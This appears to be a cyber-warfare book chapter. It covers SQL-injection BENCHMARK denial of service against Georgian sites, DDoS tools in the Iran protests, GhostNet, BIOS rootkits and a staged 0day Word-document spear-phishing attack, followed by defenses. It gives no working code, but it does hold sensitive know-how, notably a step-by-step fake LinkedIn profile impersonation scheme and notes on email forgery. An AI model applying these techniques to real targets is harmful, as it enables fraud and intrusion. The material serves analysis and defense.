There are so many emerging threats to computer networks that a detailed overview of them is beyond the scope of this book. Instead, this chapter addresses various modes of attack that have been used in cyber warfare and espionage, as well as a few new innovations that seem particularly perilous to high-value targets such as SCADA systems or classified networks within the defense industry (both government and contractor systems).
A significant portion of the discussion on the StopGeorgia.ru forum was dedicated to traditional (distributed denial of service) DDoS tactics and tools, but more interesting tactics discussed there focused on abusing application-level vulnerabilities in order to take advantage of CPU-intensive stored SQL procedures.
By abusing CPU-intensive application-level vulnerabilities (such as with SQL injection), Georgian information systems can be rendered inoperative using a small number of attacking machines. Whereas traditional DDoS attacks against robust websites can require thousands of bots simultaneously attacking the victim server, exploitation of SQL injection vulnerabilities require only a handful of attacking machines to achieve the same effect.
The discovery and exploitation of these application-level vulnerabilities shows moderate technical sophistication, but more importantly, it shows planning, organization, targeted reconnaissance, and evolution of attacks.
The introduction of SQL injection attacks in conjunction with DoS attacks is alarming for many reasons:
SQL injection attacks could indicate that all data stored in the backend databases could have been pilfered or altered. This information could be used as a foundation for further attacks and intelligence gathering against related web applications.
Attackers who have pilfered the backend databases via SQL injection could have access to legitimate username and password combinations, allowing them to masquerade as legitimate users, providing a sustained source for intelligence gathering. This is especially alarming for .gov.ge systems, where password reuse or other vulnerabilities could lead to the compromise of other sensitive systems or loss of sensitive information.
In some cases, SQL injection attacks can be used to compromise not only information stored in backend databases but the machine hosting the database. This represents a compromise of an organization’s internal infrastructure.
Once the underlying system is compromised, it can be used as a stepping stone for further attacks against an organization’s internal network. Considering the poor state of internal network security for most organizations, a moderately sophisticated attacker could use a compromised database server to gain access to a considerable amount of internal information. Once again, this is especially alarming for .gov.ge systems or applications that could have access to other sensitive systems.
Finally, detection of a targeted SQL injection attack designed to pilfer data or compromise the underlying system during a rigorous, traditional DDoS attack would be extremely difficult to detect, especially if it included SQL injection attacks designed to cause a DoS condition.
SQL injection is an attack technique that takes advantage of poor secure-application coding practices. If an application does not provide the correct validation for user-supplied input parameters, an attacker could embed SQL commands within the parameters passed from the web application to the backend database.
The result is that the attacker can execute arbitrary SQL queries and/or commands on the backend database server, using the web application as the delivery mechanism. SQL injection is a critical application issue and typically results in the loss of all the data stored within the database and a compromise of the system housing the database. Additional information on generic SQL injection attacks can be found at http://www.owasp.org/index.php/SQL_injection.
If a hacker discovers a SQL injection vulnerability on a website, but the SQL injection does not return any readable data, this is known as “blind” SQL injection. The blind SQL injection vulnerability executes an attacker-controlled SQL query on the backend database with no indication as to whether the injected query actually succeeded or failed.
Hackers turned to the BENCHMARK stored procedure (for SQL injection against MySQL databases) to get some indication as to whether their injected SQL query succeeded or failed. By including a Boolean clause (true or false) in the blind SQL injection, the hacker can craft a SQL injection in such a fashion so that if the query is successful (and only if it is successful), the database runs the BENCHMARK query.
The BENCHMARK queries chosen by the hacker are CPU-intensive, typically crypto functions run thousands of times. Since these CPU-intensive BENCHMARK queries take time to complete, the backend becomes “stalled” until the BENCHMARK is completed. If the hacker launches the blind SQL injection with a CPU-intensive BENCHMARK and the application “stalls” for a few seconds before displaying the page, the hacker knows the SQL injection was successful. Conversely, if the attacker launches the blind SQL injection with a CPU-intensive BENCHMARK and the application immediately displays the page, the hacker knows the SQL injection was not successful.
Visit http://www.milw0rm.com/papers/149 for more information about using the BENCHMARK stored procedure for blind SQL injection. It’s interesting to note that the hacker who wrote the tutorial is trying to reduce the CPU load involved with BENCHMARK usage in order to avoid detection/server-performance issues.
Now, the specific techniques suggested in the StopGeorgia.ru forum were a new twist on those for typical SQL injection vulnerability exploitation. Some posters to the forum suggested the using the BENCHMARK stored procedure to consume massive amounts of CPU cycles on the backend database. BENCHMARK has been a popular technique for blind SQL injection, but using it to intentionally cause a DoS is rare.
The forum suggested that attackers use SQL injection vulnerabilities to call a CPU-intensive task (built-in crypto functions) for the backend database to execute hundreds of thousands of times. One post suggested that nested BENCHMARKs be used, each running 100,000 times (that equates to 100,000 × 100,000, or about 10,000,000,000 times)! These queries would simply consume the CPU for the system hosting the database (often it’s the same machine as the web server).
By using BENCHMARK, a single web request can cause a significant load on the database server, and in most cases a single machine can render the database server inoperative. Specific SQL injection points were identified on the forums, as well as observed in collected web server logs. SQL injection was undoubtedly used in attacks against Georgia servers.
Note
The BENCHMARK stored procedure is specific to MySQL databases, but other popular databases have similar functionality. Other specific techniques mentioned in both forums for bringing down or gaining illicit access to machines included:
Regularly checking the status of a host through
ping -t<host>-i<interval>Using SQL injection through an improperly sanitized query string
Brute-force attacks
Social engineering to gain passwords
The mid-June 2009 Iranian elections were so flawed that opposition protests, fueled by harsh Iranian government treatment against protesters, overflowed onto the Internet, creating a wave of instant support for the protesters and fury against the Iranian government after Iranian president Mahmoud Ahmadinejad defeated rival Mir Hussein Moussavi in a contested election.
Official Iranian filtering targeted news media of all types, so Iranian dissidents turned to posting photos and videos on Internet sites such as YouTube and various blogging platforms. Protests, when interrupted by Iranian police, turned violent, and within a few days eight fatalities were reported.
The coordinating medium for this outrage was none other than Twitter, the microblogging service that has defied attempts by journalists, politicians, and comedians to categorize it as a tool of the self-absorbed.
In fact, Twitter has proven its value as a real-time reporting service in crisis environments, for example, Mumbai during the November 2008 terrorist attacks. In the Iranian crisis, the Twitter platform was used by Iranians upset with the election results that showed the current President achieving a landslide victory.
Links to automated DDoS tools were circulated, along with recommended target websites. For example, Jose Nazario wrote on his blog Security to the Core:
Here’s a peek at one such script [Figure 10-1], using the “page reboot” site as a basis for the tools. Page reboot uses a very simple method, namely use Javascript to reload the URL in the page repeatedly. The browser will happily do so, just like the user was sitting there hitting F5 in their Internet Explorer. This can cause some stress on the attacker’s specific machine, reveals their IPs through the HTTP connections, and is trivial to filter, but is growing in popularity.
In this case someone’s put together a single page of HTML with multiple “IFRAME” elements which embed the remote page into the local page. This is a simple magnifier of the local site’s effect but has the effect of diminishing results: the attacker’s machine slows down for all attacks as it loads them and consumes more bandwidth as it loads all of the pages again and again.
A Norwegian journalist created a “Cyberwar Guide for Beginners” that provides guidance in a number of areas of interest to the global online community who is watching events unfold and wants to do something to help:
The purpose of this guide is to help you participate constructively in the Iranian election protests through twitter:
Do NOT publicise proxy IP’s over twitter, and especially not using the #iranelection hashtag. Security forces are monitoring this hashtag, and the moment they identify a proxy IP they will block it in Iran. If you are creating new proxies for the Iranian bloggers, DM them to @stopAhmadi or @iran09 and they will distributed them discretely to bloggers in Iran.
Hashtags, the only two legitimate hashtags being used by bloggers in Iran are #iranelection and #gr88, other hashtag ideas run the risk of diluting the conversation.
Keep your bull$hit filter up! Security forces are now setting up twitter accounts to spread disinformation by posing as Iranian protesters. Please don’t retweet impetously, try to confirm information with reliable sources before retweeting. The legitimate sources are not hard to find and follow.
Help cover the bloggers: change your twitter settings so that your location is TEHRAN and your time zone is GMT +3.30. Security forces are hunting for bloggers using location and timezone searches. If we all become ‘Iranians’ it becomes much harder to find them.
Don’t blow their cover! If you discover a genuine source, please don’t publicise their name or location on a website. These bloggers are in REAL danger. Spread the word discretely through your own networks but don’t signpost them to the security forces. People are dying there, for real, please keep that in mind.
Denial of Service attacks. If you don’t know what you are doing, stay out of this game. Only target those sites the legitimate Iranian bloggers are designating. Be aware that these attacks can have detrimental effects to the network the protesters are relying on. Keep monitoring their traffic to note when you should turn the taps on or off.
Do spread the (legitimate) word, it works! When the bloggers asked for twitter maintenance to be postponed using the #nomaintenance tag, it had the desired effect. As long as we spread good information, provide moral support to the protesters, and take our lead from the legitimate bloggers, we can make a constructive contribution.
Please remember that this is about the future of the Iranian people, while it might be exciting to get caught up in the flow of participating in a new meme, do not lose sight of what this is really about.
Unfortunately, by engaging in DDoS attacks, an individual may contribute to the closure of Internet access by the Iranian government, thus shutting off the very life line that the Iranian opposition needs to build the support of the global community.
The Open Net Initiative recently released a detailed report on Internet filtering (i.e., censorship) by the government of Iran. A big part of Tehran’s control derives from all Internet traffic being routed through one bottleneck—the Telecommunications Company of Iran (TCI). Another is the prohibition against private citizens subscribing to high-speed service.
The single greatest takeaway for social media advocates in the Iranian elections is that there is nothing clear cut about the event nor the usefulness of the tool. Individuals’ eagerness to join in the DDoS flood may be putting the very people that they wish to help at risk. Those looking with a noncritical eye to tweets for “real,” as-it-happens information may be reading an Iranian government disinformation post. There is a commensurate increase in risk and reward.
A group of Canadian researchers recently uncovered a massive Chinese computer espionage ring (GhostNet) involving almost 1,300 infected computers in 103 countries. According to their report, about 30% of the infected hosts were located in government offices, media companies, and nongovernment organizations (NGOs).
The malware used, a type of Trojan known as a remote access tool (RAT), was of Chinese design and named gh0st RAT. Once infected, the attacker gained complete control of the host computer, including the ability to:
Activate a web cam and conduct audio and video surveillance
Search for and exfiltrate sensitive documents
Initiate keylogging to capture usernames and passwords
One of the many interesting lessons derived from the GhostNet investigation is that none of the espionage tools or techniques that was used so successfully were new. It was basically a variant of the old Spear Phishing scheme, which is when an attacker sends out a carefully worded email message to an organization or company that features highly focused content.
For example, the email message used to spread the gh0st RAT Trojan contained the following subject line: “Translation of Freedom Movement ID Book for Tibetans in Exile.”
The email message contained the emblem of the Tibetan Government in Exile, and the attached .doc file had the same title as the subject line. When clicked, the file apparently opened normally; however, once opened, a series of unfortunate events followed:
A vulnerability on the user’s machine was exploited and the malware was loaded.
Once installed, the malware attempted to make contact with its control server.
Any operator with access to the control server’s interface could then gain complete control of the infected computer and access to the network to which it belonged.
Anti-virus software frequently did not detect this Trojan. According to the report’s authors, only 11 of 34 anti-virus programs successfully quarantined the infected document; the other 23 simply didn’t catch it.
In 2006, Australia’s CERT announced an 80% miss rate by anti-virus (AV) programs in stopping malware, principally because hackers will test their code against existing AV programs until it escapes detection.
This underscores one of the most important points in understanding any cyber defense strategy: both states and enterprises that must defend sensitive data from malicious access cannot rely solely on technology to protect them. The human element, with all of its strengths and weaknesses, is paramount.
While millions of people of all ages enjoy many of the benefits of being connected to the Web, it also raises their risk for being victimized by an online scam or attack. The more information a cyber criminal knows about his target, the easier it is to create an attractive lure, and the more likely it is that an unsuspecting individual (as demonstrated by the GhostNet investigation) will take the bait.
Social media sites such as Twitter, Facebook, Plaxo, and LinkedIn meet legitimate networking needs among professional adults; however, they are concurrently being tracked, mined, searched, and ranked for marketing purposes by companies such as Nielson Buzzmetrics, Visible Technologies, and other firms that perform brand-monitoring and name-recognition services for businesses.
Social engineering as a tactic for hackers precedes all of the previously mentioned services by many years. In fact, the “old-school” approach consisted of dumpster diving and other “meat space” techniques used to gather user login and password information from target companies. Thanks to the rapidly growing social media space, those old-school techniques have given way to a completely online approach.
The Government 2.0 movement of 2009 highlights many of the benefits that might accrue with the use of social software by government officials and agencies, including providing a real-time gauge for evaluating public sentiment during key moments of national or international events and policy debate.
The negative aspects relate directly to social engineering hacks. Government employees’ user profiles, not to mention their posts, often contain personal data that a motivated hacker could leverage into an attack similar to the one described in the GhostNet case.
Since there are legitimate uses for this information as well as nefarious ones, specialty Internet search engines are being created that focus on the Social Web. A January 2009 post on the Online Marketing blog (http://www.toprankblog.com/2009/01/6-social-search-engines/) reviewed no less than six new social search engines, three of which were:
- WhosTalkin.com
This application searches for keyword topics in conversation threads taking place in over 60 social media portals.
- Samepoint.com
This application tracks millions of conversations taking place in tens of thousands of blogs and on social media sites.
- OneRiot.com
OneRiot crawls the links people share on Twitter, Digg, and other social sharing services, and then indexes the content on those pages in seconds.
Google Labs recently created the Social Graph API, which allows developers to access the connections that people have made via the Web, whether through blogs, Digg, YouTube, LinkedIn, Facebook, Twitter, or other social networks. This has significant intelligence-gathering implications for adversaries looking to target specific groups of people.
The Social Graph API works by searching for pages that belong to you via your membership in one of the many social networks on the Web. In addition to finding your Twitter, Daily Motion, and Flickr home pages (for example), it will also look for links between friends, followers, or even your blog roll.
By now it should be obvious that employees who work in targeted, high-value industries (e.g., government, public utilities, defense contractors) must exercise caution in revealing any personal details, areas of interest, and affiliations. It is simply too easy to build detailed personal profiles from open sources, and it’s getting easier every day.
Jeff Jonas has established a well-deserved reputation for excellence in demonstrating how large organizations can sort through ever-growing mountains of data and make vital connections, whether the purpose is national security or sustaining profitability.
In 2009, Jonas wrote a blog post entitled “Channel Consolidation.” In it, he makes the case that channel consolidation is an essential ingredient to improving accuracy in prediction (for example, when an online travel site makes suggestions based on your past trips).
Jeff points out that channel separation is what we have known all of our lives. Even though our actions are recorded by each credit card purchase and cell phone call, our banker doesn’t know where we were at 11 a.m. yesterday, and your doctor isn’t informed as to the contents of your email inbox.
Channel consolidation, however, is what we are moving toward. As Jonas points out, it is an essential component in making accurate predictions about what you want to read or what movie you want to rent. Consumers like the convenience, and businesses like the efficiency. Law enforcement and intelligence services like it for their own classified reasons.
In his blog post on the subject, Jeff points to Facebook as an example of what channel consolidation might look like:
Facebook makes a great example of channel consolidation. All your emails, instant messages, status updates, past/present/and future travel, annotated photos, your social circle, memberships, self-expressed interests, and more...all bundled together in one nice little package, under your user account. Traditionally such life details are expressed on diverse channels—unobservable to any single entity. No more. Facebook, with this panoramic view of its users, now likely has a substantially more complete picture of a person than almost any other single entity.
How powerful is this? Here is one example: if you are a Facebook user maybe you have noticed the increasingly (spooky smart) relevant ads. I get ads that read “Are you 44, a triathlete, and want abs like this?” Or a well-timed ad over the summer when I was in Southern California that read: “Are you looking for a triathlete coach in the Orange County area?” It is so relevant I find it very hard not to click on the ad! (Be assured I do resist.)
The more sense Facebook makes of users, the better the service, the more folks will find Facebook irreplaceable, the more users will flock to the platform, and last but not least, the more advertisers are willing to pay. Everyone seems the winner.
LinkedIn and other social networking sites are essentially trust networks, but with little in the way of authentication. Therefore the obvious question—how reliable is the trust that is extended?—remains a difficult one to answer.
Nitesh Dhanjani, a computer security expert who specializes in the financial sector, believes that the problem will grow worse and that our privacy, reputations, and identities are stake. (See his book Hacking: The Next Generation (http://oreilly.com/catalog/9780596154585/) [O’Reilly]).
Nitesh points to LinkedIn as an example. Imagine that you are a consultant with a profile at LinkedIn. Your contact list represents intellectual property and you want to protect it from the prying eyes of your competitors. At the same time, it may benefit you to share that property in a way that is mutually beneficial. This requires a way to authenticate the identity of each member, something that doesn’t yet exist on any social networking site, including LinkedIn.
From an adversarial point of view, how would one take advantage of this situation? Since LinkedIn builds its identity-management structure around email addresses, a social engineering hack would probably take advantage of that. Email addresses are easy to spoof, so all one needs to do to access a target contact list is to get the target to connect with a fake LinkedIn account. Here is the process that Nitesh imagined:
Think of an individual the target LinkedIn member may know but who doesn’t yet have a LinkedIn account.
Create an email address with the name of this individual, such as [email protected] or [email protected]. You can go as far as creating a similar looking domain name of the company the individual may work at (for example, @applee.com, @app1e.com, etc.).
Create a profile on LinkedIn with the name and email address of the individual.
Send an invitation to the target using the new LinkedIn account, and wait for the target to accept.
Bonus: other people the target is connected to will notice that he or she has added a new friend (the individual you picked). Should the individual happen to be a mutual friend of these people, they will likely attempt to connect to your new LinkedIn profile, offering you even more details about the target’s network.
Once connected, the circle of trust is established and resources begin to be exchanged, partly facilitated by LinkedIn’s own user interface and partly out of enthusiasm of the members. Since an adversary’s fraudulent profile needs as many connections as he can secure in order to be believable and gain trust, he may very well appear to be the perfect LinkedIn member—outgoing, gregarious, helpful, informative, happy to provide contacts and recommendations, and so on.
As a result, other legitimate members will be happy to nominate or provide recommendations for him, and that could include membership in LinkedIn discussion groups dedicated to discussing issues related to cyber warfare or intelligence or IT security. The list is endless.
A solution to this dilemma is not easy to come by, since social networks rely on members sharing information about themselves, and indeed people love to share information. The beauty of this hack is that it plays on perfectly natural and accepted modes of behavior.
It may be that some individuals employed in critical jobs should be prohibited from joining such networks. At the very least, it wouldn’t hurt for everyone to become a bit more skeptical about their online relationships. At best, a more secure authentication system should be put into place.
This is a newly discovered exploit created by two researchers who work for Core Security Technologies. Although BIOS-based attacks are not new, this one evades anti-virus software and cannot be destroyed by rebooting an infected computer.
According to its developers, Anibal Sacco and Alfredo Ortega, the infected machine can go on to attack other machines without using its host machine’s memory or hard drive. Furthermore, since it runs before any other code on the system, it can allow an attacker to deactivate the anti-virus software.
Defense against this exploit is difficult at best. Its creators say that the best options are “to prevent the flashing of the BIOS by enabling ‘write’ protection on the motherboard, or deploying digitally signed BIOSes.”
In March 2009, a ifew employees of Applicure, an Israeli network security company, launched a SQL injection attack against the Hezbollah website, temporarily taking it offline.
What made this event unique was how they did it: they used a piece of Chinese-created malware that allows subscribers to hire botnets on a monthly basis, with fees ranging from a little over $20 a month for a very small network of 10 bots to $100 a month to control 1,000 bots.
According to an article on Hareetz.com, this application—a kind of malware-as-a-service—offers a user-friendly interface that allows the operator to choose the type of attack, attack speed, and number of computers (bots).
All anti-virus software is signature-based, meaning that it relies on software security companies such as McAfee, Symantec, and Kaspersky to create a unique algorithmic hash (or signature) for each anti-virus that’s discovered. In 2008, there were so many viruses being created that Symantec needed to write a new signature every 20 seconds. In 2009, it changed to every 8 seconds.
As of this writing, Triumfant’s Worldwide Malware Signature Counter is displaying 3,704,642 malware signatures needed by AV software to be up to date. As I typed the period of that last sentence, that number increased by 5.
The counter can be found at http://www.triumfant.com/Signature_Counter.asp. As I write this second edition, the count has increased by almost 400% to 13,930,460.
Simply put, security software vendors cannot keep up this pace. More importantly, updates to customer computers cannot occur fast enough to ensure protection. Finally, it’s important to remember that no anti-virus software can protect you from a zero-day exploit, i.e., a virus that is so new that no AV signature has been created for it.
This makes it necessary for Computer Network Defense operations to become a priority in any cyber warfare strategy. It also requires the acceptance of a harsh reality, namely that the NSA and DHS (the two agencies responsible for military and civilian cyber network security, respectively) cannot possibly protect every department and every enterprise. Instead, these agencies must determine the high-priority targets in both arenas and focus on hardening those systems, while requiring 24/7 monitoring of individual networks.
Attacks against military brass and government executives make for great news stories. Media outlets often will report that “machines have been compromised” and “data has been stolen” but provide few details as to how the attacks were carried out. This section discusses the means by which targeted attacks are executed. The attack described here is based on actual attacks that have occurred. Several technical details have been changed, but the major characteristics of the attacks are intact.
Sophisticated, targeted attacks begin with research. A tremendous amount of time, money, and human brain power is dedicated to finding new vulnerabilities in widely used software such as Microsoft Word, Internet Explorer, Mozilla FireFox, and even the most widely used operating system in the world, Microsoft Windows. When a new vulnerability is discovered, the discovering organization gains an advantage: it has a weapon that that doesn’t have a specific defense, and the defender has zero knowledge that the exploit exists. These vulnerabilities are known as “0day” (pronounced “zero day” or sometimes “oh-day”) vulnerabilities. These 0day vulnerabilities are the “tip of the spear” in the offensive cyber world. These attacks result in a tremendous amount of damage, and the victim seldom realizes they’ve been compromised. DDoS attacks gain a lot of media attention because they are noisy and easy to detect, but targeted 0day attacks with custom attack payloads are silent, almost impossible to detect reliably, and represent the most powerful attack available to offensive cyber units. It is these types of attacks that represent the true capability of an offensive cyber unit.
In this example, the attacking organization has found vulnerability in the word-processing software Microsoft Word. Word is popular widely used the US government, and the attacker knows that. For the sake of clarity, the specific technical details of the exploit will not be covered; instead, this section will cover the major points of the vulnerability.
First, it is important to understand that prior to Microsoft Office 2007, all Office documents were served as a binary file format.
Note
More information about binary file formats can be found on Wikipedia at http://en.wikipedia.org/wiki/Binary_file.
Programs like Microsoft Word that consume binary file formats have a reputation of being difficult to secure and have been known to be affected by vulnerabilities that can corrupt the memory of the computer system attempting to parse the binary file format. If an attacker can corrupt the system’s memory in a controlled manner (through the use of what is known as “shellcode”), then the attacker will be able to gain access to the target system.
The exploit, along with the attacker’s shellcode, is hidden deep inside the raw binary contents of the malicious Word document. The binary structure of the Word document makes it impossible for the average user to determine whether the it contains malicious code. For example, Figure 10-2 shows a typical Word document as displayed by Microsoft Word.
Opening the same document in a hex editor shows the raw contents of the file, which are quite different than what the user sees within Microsoft Word. The average user will not be able to comprehend or detect whether malicious content exists within the binary structure of the Word file. It is within this raw binary data where the attacker will place his exploit and shellcode. A portion of the raw binary contents are shown in Figure 10-3. Would you be able to spot an exploit in the binary data?
Sophisticated organizations with robust offensive cyber capabilities will stockpile these 0day vulnerabilities, ensuring they have the cyber firepower to take advantage of targets of opportunity.
Once the attacking organization has discovered and developed a suitable exploit for a 0day vulnerability, the attacking organization moves onto the target-selection phase. Many times, target selection is given two primary considerations: the value of the information that will be obtained from a particular target and the difficulty of successful exploitation (to include likelihood of detection). 0day exploits often are deployed against personnel who have security clearance, are directly responsible for handling sensitive data, or can provide a stepping stone into a targeted organization. This makes high-ranking officials an attractive target for attacks. The costs of developing a reliable exploit in popular software is reasonably high, and sophisticated organizations will deploy 0day exploits only against those targets that will yield a solid return on vulnerability investment. Organizations deploying 0day exploits are careful to avoid detection because once the 0day is detected, it quickly loses value, as patches are developed and specific countermeasures are put in place. The technical sophistication and technical reliability of the exploit will greatly affect the likelihood of detection (or lack thereof).
Once the exploit to be used is chosen and the target selected, the attacker must deliver the exploit to the target. One of the most popular delivery methods for 0day exploits is email. Email is the lifeblood for many organizations, allowing for the exchange of information in an effective and convenient manner. Virtually every email server blocks dangerous file types such as executable (.exe) files, batch files (.bat), and scripts (.vbs), but almost every email server allows Word documents (.doc) or other Office documents to be delivered. In this case, the attacker delivers the exploit hidden deep inside a Word document, allowing it to travel unabated through the victim organization’s networks to the intended target.
Sophisticated attackers do not simply identify the email address of the target and send away; extensive reconnaissance is done before the actual exploit is sent. Collection of upcoming travel agendas, known associates, naming conventions for documents, and other details help build creditability and increase the likelihood of a successful exploit. Much of this information can be gleaned from public sources such as Google or public websites. Figures 10-4 and 10-5 show some of the types of information that can be retrieved about high-profile targets with open source intelligence (OSINT).
Sophisticated organizations use OSINT and traditional intelligence-gathering methods to collect a good operational “picture” of the target. For example, if an attacker has identified a commanding officer (CO) of a unit within one of the US military branches as the target, he would spend time to enumerate several associates that work closely with the CO. If the attacker has obtained a list of contacts (like the one shown in Figure 10-5), he could contact various members of the CO’s staff, collecting bits of intelligence to paint the operational picture surrounding around him. Pieces of information that would be valuable to an attacker include upcoming events, email addresses of associates, names and nicknames for associates, and other contact information related to the target and associates.
Once the attacker has collected intelligence on the target and the target’s associates, he can build a convincing scenario for attack. For example, after the attacker enumerates the email addresses associated with the various associates of the CO, he can forge an email that appears to come from an associate related to an upcoming event. An example email is shown in Figure 10-6.
Simple email forgery is easily done through the use of custom SMTP servers. Several programming languages provide simple APIs that can be used to forge emails, making them appear to come from any source the attacker chooses.
Once the email is sent, it becomes a weapon. The Word document attached to the mail carries a payload to infect anyone who opens the document. Signature-based intrusion-detection systems and anti-virus software will be unable to detect this attack; only the attacker has knowledge of its structure and the heuristics, since it is a 0day exploit.
Once the unsuspecting victim opens the Word document, he will be silently infected, compromising all the data on his system. The attacker then installs a rootkit on the infected system, allowing for unfettered future access. The rootkits are sophisticated and can hide from even the most discerning detection mechanisms. As detection routines improve, so does the rootkit evasion logic, creating a dangerous game of cat and mouse, with the victim’s data as the price.
Ten years ago, detecting an infected system was somewhat simple. The majority of infected systems simply connected back to an attacker requesting commands to be executed. Many times, unencrypted communications channels were used to control infected systems, and exfiltration of sensitive data was easily spotted by intrusion-detection teams. Connection back to IRC channels in foreign countries was a telltale sign that a system was compromised, and monitoring of clear-text communications from infected systems was even used in intelligence/counterintelligence efforts. Figure 10-7 shows a small portion of captured IRC communications from antiquated malware.
Today’s malware is more sophisticated and more covert. Generally speaking, today’s malware is never written to disk and is stored only in the system’s memory. This makes the forensics effort extremely difficult. Researchers from Core Security Technologies and researcher John Heasman from NGSSoftware Insight Security Research have demonstrated practical examples of how memory and PCI-based rootkits can be deployed against targets.
Additionally, gone are the days when compromised systems transmitted stolen data in the clear, directly back to the attackers’ systems. Today’s sophisticated malware takes excruciating steps to hide its communication and intentions. Encrypted commands, communications over HTTP and decentralized command and control, and exfiltration of data through covert means are the norm. For example, take the advanced versions of the Nugache malware. Researchers Dave Dittrich from the University of Washington and Sven Dietrich from the Stevens Institute of Technology studied the Nugache malware and demonstrated how it used 256-bit Rijndael to encrypt P2P command and control communication. Due to the implementation of proper crypto algorithms, even after the researchers had full access to runtime in memory data structures, the researchers were able to decrypt data flow in only one direction.
Client-side exploits target software installed on a victim’s system. Web browsers, web browser plug-ins (Java, Flash, Silverlight, etc.), word-processing software, PDF readers, and even the operating system itself are all considered client-side software. On the other hand, server-side software includes web and email servers.
Client-side 0day exploits have gained popularity with organizations employing offensive operations. Discovering vulnerabilities in a popular client-side component affects millions of users, and the research required to discover them can be done covertly, with no external indication that it is being conducted. Once a client-side vulnerability is discovered and an exploit is developed, the attacker has a weapon, ready to be deployed at a moment’s notice.
Client-side exploitation carries with it several advantages for the attacker. First, once the exploit is developed, the attacker typically has a multitude of delivery mechanisms available (web pages, Word documents, PDFs, Flash files, etc.), many of which are allowed through the firewall. For example, virtually all corporate firewalls allow their users to browse web pages and receive emails. This gives attackers the ability to circumvent perimeter security measures such as firewalls and virtual private networks (VPNs). As mentioned in previous sections, anti-virus technology simply cannot keep up with known threats, much less 0day exploits of which they have no knowledge.
Once attackers successfully exploit a client-side vulnerability, they not only gain access to all the data and information located on the compromised system, they also gain access to all the resources available to it. For example, if the compromised system is part of a larger network, the attacker gains access to that larger network. In this sense, the attacker uses the compromised machine as a stepping-stone for further attacks in the internal network. Often internal resources are not as well protected as Internet-facing resources, making them easy targets for attackers who have gained access to internal networks.
There is simply no specific defense against 0day exploits. Each 0day exploit is unique, and only the attacker knows the full details of the 0day vulnerability. However, there are some steps that an organization can take to minimize the damage done by 0day vulnerabilities.
There is simply no substitute for defense in-depth for organizations. Defenses are layered, protecting sensitive data and critical systems through many different types of defense mechanisms. This forces the attacker to increase the intelligence-gathering effort needed for successful exploitation, as he will have to understand each defensive layer protecting the desired information. A solid defense in Depth strategy also dramatically increases the sophistication and effort required for a successful exploit, as the attacker must now bypass many defenses and not just one. Defense in Depth cannot guarantee safety from exploitation attempts by sophisticated attackers, but it does increase the footprint and increase the likelihood of early detection.
Office documents are becoming increasingly popular attack surfaces. Until Microsoft transitioned to an XML format for their Office documents, files such as Microsoft Word (.doc), PowerPoint (.ppt), and Excel (.xls) documents were binary formats. Binary formats are tremendously challenging to parse and consume, opening up a large attack surface. There has been a surge in Microsoft Office-related exploits in the past few years due to its popularity in large corporations and governments. To combat this rise, Microsoft has developed the Microsoft Office Isolated Conversion Environment (MOICE) to help “reduce the security risk” of opening these documents. MOICE converts the traditional Office binary file format into the new Office Open XML format, helping to remove potential threats that may be hidden inside the binary contents of the Word document. Technologies such as virtualization allow for the execution of malicious code within controlled and constrained environments, so when 0day exploits are discovered, examination of the characteristics and the “signature” of the exploit can be examined in a safe manner.
Note
Additional information related to the MOICE can be found on Microsoft’s support site at http://support.microsoft.com/kb/935865.
A common operational security measure within government and military networks is the physical separation of networks according to classification of data. Unclassified information is physically separated from data marked SECRET, which is in turn separated from data marked TOP SECRET. The physical separation of data represents one of the most effective means of reducing the attack surface for extremely sensitive data. The physical separation of networks also carries with it significant operational overhead. The amount of effort required for users of that data to traverse between classified and unclassified networks can be high, especially in time-critical situations. Additionally, although separation of data networks allows for more stringent controls to be placed on those networks containing classified information, it also requires additional resources.
Resources are finite in every organization, which means building a robust set of defenses for classified networks will often come at a cost for the defenses for unclassified networks. Normally, the decision to allocate resources to classified networks as opposed to unclassified networks is clear cut, but in this day of OSINT and ubiquitous social media, a savvy collection of unclassified pieces can give an adversary a clear picture of classified operations.